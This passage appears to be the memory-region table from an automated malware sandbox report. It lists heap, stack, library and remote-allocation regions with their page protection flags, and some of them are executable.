|
heap
|
page read and write
|
||
|
714E000
|
stack
|
page read and write
|
||
|
88D7000
|
heap
|
page read and write
|
||
|
51D9000
|
heap
|
page read and write
|
||
|
51DB000
|
heap
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
7310000
|
direct allocation
|
page read and write
|
||
|
88E9000
|
heap
|
page read and write
|
||
|
4C0A000
|
heap
|
page read and write
|
||
|
88C8000
|
heap
|
page read and write
|
||
|
4B30000
|
trusted library allocation
|
page read and write
|
||
|
2586F000
|
heap
|
page read and write
|
||
|
41CD000
|
remote allocation
|
page execute and read and write
|
||
|
5202000
|
heap
|
page read and write
|
||
|
78C4000
|
heap
|
page read and write
|
||
|
4B3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
890E000
|
stack
|
page read and write
|
||
|
88E6000
|
heap
|
page read and write
|
||
|
3370000
|
heap
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
51D9000
|
heap
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
5E26000
|
trusted library allocation
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
4BEE000
|
stack
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
8C50000
|
direct allocation
|
page read and write
|
||
|
14F80661000
|
trusted library allocation
|
page read and write
|
||
|
769E000
|
stack
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
14FF8BD0000
|
trusted library allocation
|
page read and write
|
||
|
5090000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
51D9000
|
heap
|
page read and write
|
||
|
14FF91FA000
|
heap
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
24C71000
|
heap
|
page read and write
|
||
|
88ED000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
898B000
|
heap
|
page read and write
|
||
|
51DE000
|
heap
|
page read and write
|
||
|
85A0000
|
trusted library allocation
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
24C71000
|
heap
|
page read and write
|
||
|
25261000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
30E7000
|
heap
|
page read and write
|
||
|
51DF000
|
heap
|
page read and write
|
||
|
24BE2000
|
heap
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
2B17000
|
heap
|
page read and write
|
||
|
295F000
|
unkown
|
page read and write
|
||
|
8890000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
51F7000
|
heap
|
page read and write
|
||
|
30FB000
|
heap
|
page read and write
|
||
|
24CA7000
|
heap
|
page read and write
|
||
|
51FA000
|
heap
|
page read and write
|
||
|
33AA000
|
heap
|
page read and write
|
||
|
51DF000
|
heap
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
7BEB000
|
stack
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
8B80000
|
trusted library allocation
|
page execute and read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
51DE000
|
heap
|
page read and write
|
||
|
25364000
|
heap
|
page read and write
|
||
|
7350000
|
direct allocation
|
page read and write
|
||
|
51F0000
|
heap
|
page read and write
|
||
|
14F80704000
|
trusted library allocation
|
page read and write
|
||
|
88D7000
|
heap
|
page read and write
|
||
|
14FF905C000
|
heap
|
page read and write
|
||
|
4C1F000
|
unkown
|
page read and write
|
||
|
14F81D84000
|
trusted library allocation
|
page read and write
|
||
|
33AA000
|
heap
|
page read and write
|
||
|
7FFD34680000
|
trusted library allocation
|
page read and write
|
||
|
51D9000
|
heap
|
page read and write
|
||
|
4CB9000
|
heap
|
page read and write
|
||
|
14F81DA8000
|
trusted library allocation
|
page read and write
|
||
|
25D70000
|
heap
|
page read and write
|
||
|
2AF0000
|
heap
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
|
88D7000
|
heap
|
page read and write
|
||
|
3410000
|
heap
|
page read and write
|
||
|
14FF9240000
|
heap
|
page read and write
|
||
|
51E4000
|
heap
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
775F000
|
stack
|
page read and write
|
||
|
32E8000
|
heap
|
page read and write
|
||
|
25261000
|
heap
|
page read and write
|
||
|
332F000
|
stack
|
page read and write
|
||
|
7FFD34862000
|
trusted library allocation
|
page read and write
|
||
|
88E9000
|
heap
|
page read and write
|
||
|
86A0000
|
trusted library allocation
|
page read and write
|
||
|
51D8000
|
heap
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
7FFD34766000
|
trusted library allocation
|
page execute and read and write
|
||
|
51EC000
|
heap
|
page read and write
|
||
|
14F815B8000
|
trusted library allocation
|
page read and write
|
||
|
520D000
|
heap
|
page read and write
|
||
|
14F8008D000
|
trusted library allocation
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
7990000
|
heap
|
page execute and read and write
|
||
|
4945000
|
remote allocation
|
page execute and read and write
|
||
|
2F75000
|
heap
|
page read and write
|
||
|
51FA000
|
heap
|
page read and write
|
||
|
14F80B97000
|
trusted library allocation
|
page read and write
|
||
|
5228000
|
heap
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
88E9000
|
heap
|
page read and write
|
||
|
2100A8B000
|
stack
|
page read and write
|
||
|
30F5000
|
heap
|
page read and write
|
||
|
217FE7E000
|
stack
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
78E9000
|
heap
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
8590000
|
trusted library allocation
|
page read and write
|
||
|
4BF1000
|
heap
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
8C10000
|
trusted library allocation
|
page read and write
|
||
|
51DD000
|
heap
|
page read and write
|
||
|
30CE000
|
stack
|
page read and write
|
||
|
14F8049E000
|
trusted library allocation
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
88E9000
|
heap
|
page read and write
|
||
|
51EC000
|
heap
|
page read and write
|
||
|
24CA5000
|
heap
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page execute and read and write
|
||
|
26294000
|
heap
|
page read and write
|
||
|
6CFE000
|
stack
|
page read and write
|
||
|
4BF8000
|
heap
|
page read and write
|
||
|
7A5E000
|
stack
|
page read and write
|
||
|
88E6000
|
heap
|
page read and write
|
||
|
2D5C000
|
heap
|
page read and write
|
||
|
14F902F8000
|
trusted library allocation
|
page read and write
|
||
|
520D000
|
heap
|
page read and write
|
||
|
14F8022D000
|
trusted library allocation
|
page read and write
|
||
|
217FD7E000
|
stack
|
page read and write
|
||
|
8580000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AFA000
|
heap
|
page read and write
|
||
|
8C60000
|
direct allocation
|
page read and write
|
||
|
3048000
|
heap
|
page read and write
|
||
|
51EC000
|
heap
|
page read and write
|
||
|
5207000
|
heap
|
page read and write
|
||
|
51E5000
|
heap
|
page read and write
|
||
|
4C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
217F87E000
|
stack
|
page read and write
|
||
|
2D5D000
|
heap
|
page read and write
|
||
|
315A000
|
heap
|
page read and write
|
||
|
2370000
|
heap
|
page read and write
|
||
|
33AB000
|
heap
|
page read and write
|
||
|
34C0000
|
heap
|
page read and write
|
||
|
4BF5000
|
heap
|
page read and write
|
||
|
86C0000
|
trusted library allocation
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
24CA7000
|
heap
|
page read and write
|
||
|
76DE000
|
stack
|
page read and write
|
||
|
51E4000
|
heap
|
page read and write
|
||
|
217F8FD000
|
stack
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
217FB79000
|
stack
|
page read and write
|
||
|
720E000
|
stack
|
page read and write
|
||
|
24958000
|
heap
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
88B0000
|
heap
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page read and write
|
||
|
306C000
|
heap
|
page read and write
|
||
|
729D000
|
stack
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
335A000
|
heap
|
page read and write
|
||
|
305C000
|
stack
|
page read and write
|
||
|
14FF7395000
|
heap
|
page read and write
|
||
|
70CE000
|
stack
|
page read and write
|
||
|
25270000
|
heap
|
page read and write
|
||
|
40F0000
|
remote allocation
|
page execute and read and write
|
||
|
5091000
|
heap
|
page read and write
|
||
|
25862000
|
heap
|
page read and write
|
||
|
4C52000
|
heap
|
page read and write
|
||
|
5091000
|
heap
|
page read and write
|
||
|
24CA7000
|
heap
|
page read and write
|
||
|
73E0000
|
heap
|
page read and write
|
||
|
24A59000
|
heap
|
page read and write
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
25762000
|
heap
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
30DA000
|
heap
|
page read and write
|
||
|
7340000
|
direct allocation
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
14FF94A0000
|
heap
|
page read and write
|
||
|
51DB000
|
heap
|
page read and write
|
||
|
24CA7000
|
heap
|
page read and write
|
||
|
4DD7000
|
trusted library allocation
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
24CA7000
|
heap
|
page read and write
|
||
|
710E000
|
stack
|
page read and write
|
||
|
4BF0000
|
heap
|
page execute and read and write
|
||
|
526E000
|
trusted library allocation
|
page read and write
|
||
|
4C1E000
|
heap
|
page read and write
|
||
|
4B62000
|
trusted library allocation
|
page read and write
|
||
|
1AE000
|
unkown
|
page read and write
|
||
|
8983000
|
heap
|
page read and write
|
||
|
50D1000
|
heap
|
page read and write
|
||
|
51D8000
|
heap
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
45FF000
|
stack
|
page read and write
|
||
|
FD000
|
stack
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
2F20000
|
heap
|
page readonly
|
||
|
51EC000
|
heap
|
page read and write
|
||
|
2586C000
|
heap
|
page read and write
|
||
|
24CA0000
|
heap
|
page read and write
|
||
|
86B0000
|
trusted library allocation
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
2536F000
|
heap
|
page read and write
|
||
|
14FF9497000
|
heap
|
page execute and read and write
|
||
|
51F1000
|
heap
|
page read and write
|
||
|
7FFD34865000
|
trusted library allocation
|
page read and write
|
||
|
14FF7310000
|
heap
|
page read and write
|
||
|
7300000
|
direct allocation
|
page read and write
|
||
|
25270000
|
heap
|
page read and write
|
||
|
8970000
|
heap
|
page read and write
|
||
|
14FF9490000
|
heap
|
page execute and read and write
|
||
|
51DF000
|
heap
|
page read and write
|
||
|
4B90000
|
heap
|
page readonly
|
||
|
88E9000
|
heap
|
page read and write
|
||
|
2499D000
|
heap
|
page read and write
|
||
|
7A1E000
|
stack
|
page read and write
|
||
|
7085000
|
heap
|
page execute and read and write
|
||
|
51F0000
|
heap
|
page read and write
|
||
|
23B0000
|
heap
|
page read and write
|
||
|
8C30000
|
direct allocation
|
page read and write
|
||
|
8958000
|
heap
|
page read and write
|
||
|
14FF7206000
|
heap
|
page read and write
|
||
|
D01D000
|
direct allocation
|
page execute and read and write
|
||
|
24961000
|
heap
|
page read and write
|
||
|
8950000
|
heap
|
page read and write
|
||
|
2100A0D000
|
stack
|
page read and write
|
||
|
A81D000
|
direct allocation
|
page execute and read and write
|
||
|
5345000
|
remote allocation
|
page execute and read and write
|
||
|
24CA7000
|
heap
|
page read and write
|
||
|
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
|
51D9000
|
heap
|
page read and write
|
||
|
4C3E000
|
stack
|
page read and write
|
||
|
24CA5000
|
heap
|
page read and write
|
||
|
217FBF7000
|
stack
|
page read and write
|
||
|
79DE000
|
stack
|
page read and write
|
||
|
51DF000
|
heap
|
page read and write
|
||
|
4BF1000
|
heap
|
page read and write
|
||
|
5C81000
|
trusted library allocation
|
page read and write
|
||
|
217FEFE000
|
stack
|
page read and write
|
||
|
2D5C000
|
stack
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
88E9000
|
heap
|
page read and write
|
||
|
88E9000
|
heap
|
page read and write
|
||
|
8890000
|
heap
|
page read and write
|
||
|
53D0000
|
trusted library allocation
|
page read and write
|
||
|
14F80001000
|
trusted library allocation
|
page read and write
|
||
|
88DE000
|
heap
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
4B20000
|
trusted library allocation
|
page read and write
|
||
|
78B4000
|
heap
|
page read and write
|
||
|
50D1000
|
heap
|
page read and write
|
||
|
51F7000
|
heap
|
page read and write
|
||
|
24961000
|
heap
|
page read and write
|
||
|
249AA000
|
heap
|
page read and write
|
||
|
88E6000
|
heap
|
page read and write
|
||
|
24BAA000
|
heap
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
24B7A000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
86E0000
|
trusted library allocation
|
page read and write
|
||
|
14FF714D000
|
heap
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
14FF9523000
|
heap
|
page read and write
|
||
|
24C71000
|
heap
|
page read and write
|
||
|
51F7000
|
heap
|
page read and write
|
||
|
73DA000
|
stack
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
14FF8C20000
|
trusted library allocation
|
page read and write
|
||
|
14F81DBD000
|
trusted library allocation
|
page read and write
|
||
|
7A9D000
|
stack
|
page read and write
|
||
|
217F9FE000
|
stack
|
page read and write
|
||
|
25261000
|
heap
|
page read and write
|
||
|
4BF6000
|
heap
|
page read and write
|
||
|
33AA000
|
heap
|
page read and write
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
2783000
|
heap
|
page read and write
|
||
|
7FFD34683000
|
trusted library allocation
|
page execute and read and write
|
||
|
24C71000
|
heap
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
24CA5000
|
heap
|
page read and write
|
||
|
5208000
|
heap
|
page read and write
|
||
|
308E000
|
unkown
|
page read and write
|
||
|
24C71000
|
heap
|
page read and write
|
||
|
24CA0000
|
heap
|
page read and write
|
||
|
51D9000
|
heap
|
page read and write
|
||
|
51E8000
|
heap
|
page read and write
|
||
|
25866000
|
heap
|
page read and write
|
||
|
217FC78000
|
stack
|
page read and write
|
||
|
283C000
|
stack
|
page read and write
|
||
|
14FF9539000
|
heap
|
page read and write
|
||
|
2782000
|
heap
|
page read and write
|
||
|
886C000
|
stack
|
page read and write
|
||
|
864E000
|
stack
|
page read and write
|
||
|
53D0000
|
trusted library allocation
|
page read and write
|
||
|
32AE000
|
stack
|
page read and write
|
||
|
329D000
|
stack
|
page read and write
|
||
|
24CA5000
|
heap
|
page read and write
|
||
|
33AE000
|
heap
|
page read and write
|
||
|
88D7000
|
heap
|
page read and write
|
||
|
14FF91B0000
|
heap
|
page read and write
|
||
|
72E0000
|
direct allocation
|
page read and write
|
||
|
51F4000
|
heap
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
|
25270000
|
heap
|
page read and write
|
||
|
24CA0000
|
heap
|
page read and write
|
||
|
217F496000
|
stack
|
page read and write
|
||
|
24CA7000
|
heap
|
page read and write
|
||
|
14FF7330000
|
heap
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
5000000
|
trusted library allocation
|
page read and write
|
||
|
235E000
|
stack
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
771E000
|
stack
|
page read and write
|
||
|
24CA5000
|
heap
|
page read and write
|
||
|
4C1E000
|
heap
|
page read and write
|
||
|
51D0000
|
trusted library allocation
|
page read and write
|
||
|
88D7000
|
heap
|
page read and write
|
||
|
8820000
|
trusted library allocation
|
page read and write
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
24C71000
|
heap
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
88E9000
|
heap
|
page read and write
|
||
|
7FFD34684000
|
trusted library allocation
|
page read and write
|
||
|
14F8164A000
|
trusted library allocation
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
51EB000
|
heap
|
page read and write
|
||
|
718E000
|
stack
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
249C2000
|
heap
|
page read and write
|
||
|
24B4C000
|
heap
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26287000
|
heap
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
24CA7000
|
heap
|
page read and write
|
||
|
4B80000
|
trusted library allocation
|
page read and write
|
||
|
51E2000
|
heap
|
page read and write
|
||
|
4BA8000
|
heap
|
page read and write
|
||
|
14FF7397000
|
heap
|
page read and write
|
||
|
7FFD34736000
|
trusted library allocation
|
page read and write
|
||
|
5202000
|
heap
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
14FF7130000
|
heap
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
9340000
|
direct allocation
|
page execute and read and write
|
||
|
51F0000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
8815000
|
trusted library allocation
|
page read and write
|
||
|
8660000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
4BBF000
|
stack
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
796C000
|
heap
|
page read and write
|
||
|
BC1D000
|
direct allocation
|
page execute and read and write
|
||
|
75DB000
|
stack
|
page read and write
|
||
|
33AA000
|
heap
|
page read and write
|
||
|
14F81DAC000
|
trusted library allocation
|
page read and write
|
||
|
8881000
|
heap
|
page read and write
|
||
|
14FF9515000
|
heap
|
page read and write
|
||
|
14F80BAC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
|
5005000
|
heap
|
page read and write
|
||
|
4C48000
|
trusted library allocation
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
4BFF000
|
heap
|
page read and write
|
||
|
14FF9391000
|
heap
|
page read and write
|
||
|
14FF91A0000
|
heap
|
page execute and read and write
|
||
|
8890000
|
heap
|
page read and write
|
||
|
88E9000
|
heap
|
page read and write
|
||
|
2CEF000
|
unkown
|
page read and write
|
||
|
8890000
|
heap
|
page read and write
|
||
|
2E86000
|
stack
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
8670000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
14F81E9E000
|
trusted library allocation
|
page read and write
|
||
|
14FF9370000
|
heap
|
page read and write
|
||
|
217FAFC000
|
stack
|
page read and write
|
||
|
3100000
|
heap
|
page readonly
|
||
|
53D0000
|
trusted library allocation
|
page read and write
|
||
|
71CE000
|
stack
|
page read and write
|
||
|
5CA9000
|
trusted library allocation
|
page read and write
|
||
|
5213000
|
heap
|
page read and write
|
||
|
2100B0B000
|
stack
|
page read and write
|
||
|
2A3E000
|
unkown
|
page read and write
|
||
|
217FFBF000
|
stack
|
page read and write
|
||
|
14F90021000
|
trusted library allocation
|
page read and write
|
||
|
5E2C000
|
trusted library allocation
|
page read and write
|
||
|
309A000
|
stack
|
page read and write
|
||
|
14F8049A000
|
trusted library allocation
|
page read and write
|
||
|
24958000
|
heap
|
page read and write
|
||
|
14F80BB8000
|
trusted library allocation
|
page read and write
|
||
|
2E3B000
|
stack
|
page read and write
|
||
|
86EE000
|
trusted library allocation
|
page read and write
|
||
|
51E4000
|
heap
|
page read and write
|
||
|
51F7000
|
heap
|
page read and write
|
||
|
53D0000
|
trusted library allocation
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
51DE000
|
heap
|
page read and write
|
||
|
51DC000
|
heap
|
page read and write
|
||
|
51D0000
|
heap
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
14FF95AF000
|
heap
|
page read and write
|
||
|
5218000
|
heap
|
page read and write
|
||
|
51D9000
|
heap
|
page read and write
|
||
|
24C71000
|
heap
|
page read and write
|
||
|
4BA0000
|
heap
|
page read and write
|
||
|
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
|
14FF9588000
|
heap
|
page read and write
|
||
|
4B00000
|
trusted library section
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
2D5C000
|
heap
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
326D000
|
stack
|
page read and write
|
||
|
8881000
|
heap
|
page read and write
|
||
|
25767000
|
heap
|
page read and write
|
||
|
8CA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
14F8048E000
|
trusted library allocation
|
page read and write
|
||
|
88DB000
|
heap
|
page read and write
|
||
|
33AA000
|
heap
|
page read and write
|
||
|
2E6C000
|
stack
|
page read and write
|
||
|
14F81D9C000
|
trusted library allocation
|
page read and write
|
||
|
2760000
|
heap
|
page read and write
|
||
|
755B000
|
stack
|
page read and write
|
||
|
520D000
|
heap
|
page read and write
|
||
|
7974000
|
heap
|
page read and write
|
||
|
9E1D000
|
direct allocation
|
page execute and read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
14FF92A2000
|
heap
|
page read and write
|
||
|
7FFD34870000
|
trusted library allocation
|
page execute and read and write
|
||
|
8B50000
|
trusted library allocation
|
page read and write
|
||
|
25D78000
|
heap
|
page read and write
|
||
|
24CA0000
|
heap
|
page read and write
|
||
|
2E8B000
|
stack
|
page read and write
|
||
|
32EE000
|
stack
|
page read and write
|
||
|
36B0000
|
heap
|
page read and write
|
||
|
51E4000
|
heap
|
page read and write
|
||
|
14FF951A000
|
heap
|
page read and write
|
||
|
14FF9205000
|
heap
|
page read and write
|
||
|
29C0000
|
heap
|
page read and write
|
||
|
7FFD3468D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24C71000
|
heap
|
page read and write
|
||
|
5E13000
|
trusted library allocation
|
page read and write
|
||
|
34CE000
|
heap
|
page read and write
|
||
|
24CA0000
|
heap
|
page read and write
|
||
|
4BF6000
|
heap
|
page read and write
|
||
|
4B40000
|
trusted library allocation
|
page read and write
|
||
|
7080000
|
heap
|
page execute and read and write
|
||
|
72F0000
|
direct allocation
|
page read and write
|
||
|
2875000
|
stack
|
page read and write
|
||
|
796E000
|
heap
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
231D000
|
stack
|
page read and write
|
||
|
14F902E9000
|
trusted library allocation
|
page read and write
|
||
|
14F90001000
|
trusted library allocation
|
page read and write
|
||
|
24CA5000
|
heap
|
page read and write
|
||
|
51F2000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
88ED000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
2D50000
|
heap
|
page read and write
|
||
|
51D9000
|
heap
|
page read and write
|
||
|
4B33000
|
trusted library allocation
|
page execute and read and write
|
||
|
248E1000
|
heap
|
page read and write
|
||
|
51F3000
|
heap
|
page read and write
|
||
|
2F75000
|
heap
|
page read and write
|
||
|
8B70000
|
trusted library allocation
|
page read and write
|
||
|
7DF4C8180000
|
trusted library allocation
|
page execute and read and write
|
||
|
26186000
|
heap
|
page read and write
|
||
|
325D000
|
stack
|
page read and write
|
||
|
242F0000
|
remote allocation
|
page read and write
|
||
|
24C71000
|
heap
|
page read and write
|
||
|
25C71000
|
heap
|
page read and write
|
||
|
7791000
|
heap
|
page read and write
|
||
|
24CA7000
|
heap
|
page read and write
|
||
|
7890000
|
heap
|
page read and write
|
||
|
50DC000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
14F80482000
|
trusted library allocation
|
page read and write
|
||
|
33A6000
|
heap
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
51DE000
|
heap
|
page read and write
|
||
|
248E1000
|
heap
|
page read and write
|
||
|
14FF923E000
|
heap
|
page read and write
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
7AA8000
|
trusted library allocation
|
page read and write
|
||
|
89BD000
|
heap
|
page read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
7FFD34867000
|
trusted library allocation
|
page read and write
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
4CB9000
|
heap
|
page read and write
|
||
|
51DB000
|
heap
|
page read and write
|
||
|
4B10000
|
trusted library section
|
page read and write
|
||
|
88E6000
|
heap
|
page read and write
|
||
|
88E6000
|
heap
|
page read and write
|
||
|
2D53000
|
heap
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
217FF7B000
|
stack
|
page read and write
|
||
|
217F51E000
|
stack
|
page read and write
|
||
|
2F75000
|
heap
|
page read and write
|
||
|
51DB000
|
heap
|
page read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
2E7A000
|
stack
|
page read and write
|
||
|
51D8000
|
heap
|
page read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
217FDFF000
|
stack
|
page read and write
|
||
|
24B4C000
|
heap
|
page read and write
|
||
|
B21D000
|
direct allocation
|
page execute and read and write
|
||
|
521E000
|
heap
|
page read and write
|
||
|
24CA0000
|
heap
|
page read and write
|
||
|
897F000
|
heap
|
page read and write
|
||
|
217F97B000
|
stack
|
page read and write
|
||
|
24CA7000
|
heap
|
page read and write
|
||
|
14FF722F000
|
heap
|
page read and write
|
||
|
24CA0000
|
heap
|
page read and write
|
||
|
14FF9160000
|
heap
|
page execute and read and write
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
217F59E000
|
stack
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3469B000
|
trusted library allocation
|
page read and write
|
||
|
14F80B82000
|
trusted library allocation
|
page read and write
|
||
|
276B000
|
heap
|
page read and write
|
||
|
2785000
|
heap
|
page read and write
|
||
|
24CA0000
|
heap
|
page read and write
|
||
|
3330000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
894C000
|
stack
|
page read and write
|
||
|
2EA2000
|
stack
|
page read and write
|
||
|
4BF6000
|
heap
|
page read and write
|
||
|
4C23000
|
heap
|
page read and write
|
||
|
249E1000
|
heap
|
page read and write
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
51EC000
|
heap
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
51DE000
|
heap
|
page read and write
|
||
|
8680000
|
trusted library allocation
|
page read and write
|
||
|
88CD000
|
heap
|
page read and write
|
||
|
33A9000
|
heap
|
page read and write
|
||
|
2A9E000
|
stack
|
page read and write
|
||
|
25270000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
249E1000
|
heap
|
page read and write
|
||
|
51F0000
|
heap
|
page read and write
|
||
|
7FFD34831000
|
trusted library allocation
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
14FF7234000
|
heap
|
page read and write
|
||
|
4C81000
|
trusted library allocation
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
4B34000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
860E000
|
stack
|
page read and write
|
||
|
24CA5000
|
heap
|
page read and write
|
||
|
24CA0000
|
heap
|
page read and write
|
||
|
51F7000
|
heap
|
page read and write
|
||
|
51D4000
|
heap
|
page read and write
|
||
|
24CA5000
|
heap
|
page read and write
|
||
|
88D7000
|
heap
|
page read and write
|
||
|
4ABF000
|
unkown
|
page read and write
|
||
|
25868000
|
heap
|
page read and write
|
||
|
521A000
|
heap
|
page read and write
|
||
|
317D000
|
heap
|
page read and write
|
||
|
14FF95A2000
|
heap
|
page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
14FF8CE0000
|
heap
|
page read and write
|
||
|
14FF8C10000
|
heap
|
page readonly
|
||
|
33AA000
|
heap
|
page read and write
|
||
|
5CE7000
|
trusted library allocation
|
page read and write
|
||
|
24CA7000
|
heap
|
page read and write
|
||
|
53D0000
|
trusted library allocation
|
page read and write
|
||
|
4BF1000
|
heap
|
page read and write
|
||
|
4C52000
|
